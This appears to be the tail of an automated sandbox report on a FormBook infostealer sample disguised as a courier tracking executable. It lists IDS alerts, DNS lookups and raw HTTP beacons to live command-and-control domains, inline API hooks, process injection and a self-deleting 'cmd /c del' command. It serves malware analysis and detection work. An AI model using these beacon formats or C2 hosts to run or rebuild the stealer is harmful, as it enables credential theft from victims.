WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                    USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                    GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                    COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                    ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                    SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                    ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                    OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                    Language of compilation system | Country where language is spoken | Map
                                    English | Great Britain |
                                    English | United States |
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2024-09-25T09:07:05.147039+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49709 | 185.134.245.113 | 80 | TCP
                                    2024-09-25T09:07:05.147039+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49709 | 185.134.245.113 | 80 | TCP
                                    2024-09-25T09:07:05.147039+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49709 | 185.134.245.113 | 80 | TCP
                                    2024-09-25T09:07:45.103010+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49711 | 188.114.96.3 | 80 | TCP
                                    2024-09-25T09:07:45.103010+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49711 | 188.114.96.3 | 80 | TCP
                                    2024-09-25T09:07:45.103010+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49711 | 188.114.96.3 | 80 | TCP
                                    2024-09-25T09:08:26.169273+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49712 | 185.53.179.93 | 80 | TCP
                                    2024-09-25T09:08:26.169273+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49712 | 185.53.179.93 | 80 | TCP
                                    2024-09-25T09:08:26.169273+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49712 | 185.53.179.93 | 80 | TCP
                                    2024-09-25T09:09:48.966168+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49713 | 185.53.179.92 | 80 | TCP
                                    2024-09-25T09:09:48.966168+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49713 | 185.53.179.92 | 80 | TCP
                                    2024-09-25T09:09:48.966168+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49713 | 185.53.179.92 | 80 | TCP
                                    2024-09-25T09:10:09.459963+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49714 | 77.37.37.36 | 80 | TCP
                                    2024-09-25T09:10:09.459963+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49714 | 77.37.37.36 | 80 | TCP
                                    2024-09-25T09:10:09.459963+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.9 | 49714 | 77.37.37.36 | 80 | TCP
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Sep 25, 2024 09:07:04.627176046 CEST | 192.168.2.9 | 1.1.1.1 | 0xd6d9 | Standard query (0) | www.circusenergy.online | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:07:24.892429113 CEST | 192.168.2.9 | 1.1.1.1 | 0x2cee | Standard query (0) | www.cyber-eu.digital | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:07:44.595608950 CEST | 192.168.2.9 | 1.1.1.1 | 0x6534 | Standard query (0) | www.weight-loss-003.today | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:08:05.026374102 CEST | 192.168.2.9 | 1.1.1.1 | 0xde57 | Standard query (0) | www.xmld101.icu | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:08:25.595447063 CEST | 192.168.2.9 | 1.1.1.1 | 0x957e | Standard query (0) | www.walk-in-tubs-30303.bond | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:08:46.041640043 CEST | 192.168.2.9 | 1.1.1.1 | 0xbea6 | Standard query (0) | www.r86gd377hi.rent | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:09:06.848118067 CEST | 192.168.2.9 | 1.1.1.1 | 0xbf3d | Standard query (0) | www.thetrue.one | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:09:27.539417028 CEST | 192.168.2.9 | 1.1.1.1 | 0xc970 | Standard query (0) | www.tvtwenty20sr.top | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:09:48.393527985 CEST | 192.168.2.9 | 1.1.1.1 | 0x26a4 | Standard query (0) | www.pools-80761.bond | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:10:08.893843889 CEST | 192.168.2.9 | 1.1.1.1 | 0x2be0 | Standard query (0) | www.legendhud.shop | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:10:32.658777952 CEST | 192.168.2.9 | 1.1.1.1 | 0xb4d8 | Standard query (0) | www.borghardt.xyz | A (IP address) | IN (0x0001) | false
                                    Sep 25, 2024 09:10:52.830183029 CEST | 192.168.2.9 | 1.1.1.1 | 0x3eec | Standard query (0) | www.slab-leak-repair-74697.bond | A (IP address) | IN (0x0001) | false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 25, 2024 09:07:04.641756058 CEST1.1.1.1192.168.2.90xd6d9No error (0)www.circusenergy.online185.134.245.113A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:25.024241924 CEST1.1.1.1192.168.2.90x2ceeName error (3)www.cyber-eu.digitalnonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:44.634740114 CEST1.1.1.1192.168.2.90x6534No error (0)www.weight-loss-003.today188.114.96.3A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:44.634740114 CEST1.1.1.1192.168.2.90x6534No error (0)www.weight-loss-003.today188.114.97.3A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:05.047815084 CEST1.1.1.1192.168.2.90xde57Name error (3)www.xmld101.icunonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:25.650769949 CEST1.1.1.1192.168.2.90x957eNo error (0)www.walk-in-tubs-30303.bond185.53.179.93A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:46.784660101 CEST1.1.1.1192.168.2.90xbea6Name error (3)www.r86gd377hi.rentnonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:06.857754946 CEST1.1.1.1192.168.2.90xbf3dName error (3)www.thetrue.onenonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:27.631494045 CEST1.1.1.1192.168.2.90xc970Name error (3)www.tvtwenty20sr.topnonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:48.434760094 CEST1.1.1.1192.168.2.90x26a4No error (0)www.pools-80761.bond185.53.179.92A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:08.948337078 CEST1.1.1.1192.168.2.90x2be0No error (0)www.legendhud.shoplegendhud.shopCNAME (Canonical name)IN (0x0001)false
                                    Sep 25, 2024 09:10:08.948337078 CEST1.1.1.1192.168.2.90x2be0No error (0)legendhud.shop77.37.37.36A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:32.675614119 CEST1.1.1.1192.168.2.90xb4d8Name error (3)www.borghardt.xyznonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:53.605676889 CEST1.1.1.1192.168.2.90x3eecName error (3)www.slab-leak-repair-74697.bondnonenoneA (IP address)IN (0x0001)false
                                    • www.circusenergy.online
                                    • www.weight-loss-003.today
                                    • www.walk-in-tubs-30303.bond
                                    • www.pools-80761.bond
                                    • www.legendhud.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49709 | 185.134.245.113 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:07:04.651617050 CEST | 171 | OUT | GET /jd21/?Bl=8pSpW470ix&FjUh5xw=yaFk5fMSAGN82SCLgaCn8ag2pJ39IRNZ6T5Hukk791SUyW8vAMaB+rWiLjqwV1W2V2ID HTTP/1.1
                                    Host: www.circusenergy.online
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49711 | 188.114.96.3 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:07:44.640832901 CEST | 173 | OUT | GET /jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp HTTP/1.1
                                    Host: www.weight-loss-003.today
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
Sep 25, 2024 09:07:45.102806091 CEST | 895 | IN | HTTP/1.1 301 Moved Permanently
                                    Date: Wed, 25 Sep 2024 07:07:45 GMT
                                    Content-Type: text/html
                                    Content-Length: 167
                                    Connection: close
                                    Cache-Control: max-age=3600
                                    Expires: Wed, 25 Sep 2024 08:07:45 GMT
                                    Location: https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9k5ErdKN47IyNuqHiRjxQkJQdMbI5za5yRbXRCZtCzBTJkpyl24brwU5eYjVvOc64300KOAMQ3qkDk95%2BfrPDdeXZjKasLDeDaGKSIbJhO7cfgIFTy7JIqSxjNGj91Zf0Ps4FdykzXcP6RUC"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8c892dd68f39728a-EWR
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49712 | 185.53.179.93 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:08:25.658526897 CEST | 175 | OUT | GET /jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI HTTP/1.1
                                    Host: www.walk-in-tubs-30303.bond
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49713 | 185.53.179.92 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:09:48.454982042 CEST | 168 | OUT | GET /jd21/?Bl=8pSpW470ix&FjUh5xw=b/Dc4UkLHLZk59X8SmhgJ1uv172ipMqzAxiQNMhexpG5XWQ9Iwkd+tXAg5/cR36jPrSP HTTP/1.1
                                    Host: www.pools-80761.bond
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49714 | 77.37.37.36 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:10:08.961994886 CEST | 166 | OUT | GET /jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix HTTP/1.1
                                    Host: www.legendhud.shop
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA


                                    Target ID:0
                                    Start time:03:06:19
                                    Start date:25/09/2024
                                    Path:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                    Imagebase:0x400000
                                    File size:1'135'963 bytes
                                    MD5 hash:B49EDB762958E81C098B4869BA26A78C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:03:06:27
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                    Imagebase:0xa60000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:03:06:27
                                    Start date:25/09/2024
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff633410000
                                    File size:5'141'208 bytes
                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.3861610506.0000000010C89000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:03:06:30
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\wlanext.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                    Imagebase:0x6f0000
                                    File size:78'336 bytes
                                    MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:5
                                    Start time:03:06:33
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                    Imagebase:0xc50000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:03:06:34
                                    Start date:25/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:3.7%
                                      Dynamic/Decrypted Code Coverage:1.5%
                                      Signature Coverage:8.7%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:37
